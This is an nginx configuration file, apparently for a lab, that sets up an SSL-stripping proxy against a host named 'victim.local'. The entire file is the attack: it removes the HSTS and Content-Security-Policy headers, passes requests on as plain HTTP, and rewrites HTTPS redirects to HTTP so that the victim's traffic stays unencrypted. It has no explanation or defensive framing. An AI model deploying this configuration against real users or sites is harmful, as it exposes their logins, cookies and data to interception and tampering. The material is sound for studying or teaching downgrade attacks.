worker_processes auto;
events { worker_connections 1024; }
http {
  map $upstream_http_location $rewritten_location {
    default $upstream_http_location;
    ~^https://victim\.local(.*)$ http://victim.local$1;
  }

  server {
    listen 80;
    server_name _;

    location / {
      proxy_pass https://upstream:443;
      proxy_ssl_server_name on;

      proxy_hide_header Strict-Transport-Security;
      proxy_hide_header Content-Security-Policy;

      proxy_redirect off;
      proxy_set_header Host victim.local;
      proxy_set_header X-Forwarded-Proto http;

      proxy_intercept_errors on;
      error_page 301 302 307 308 = @handle_redirect;
    }

    location @handle_redirect {
      internal;
      add_header Location $rewritten_location;
      return 302;
    }
  }
}
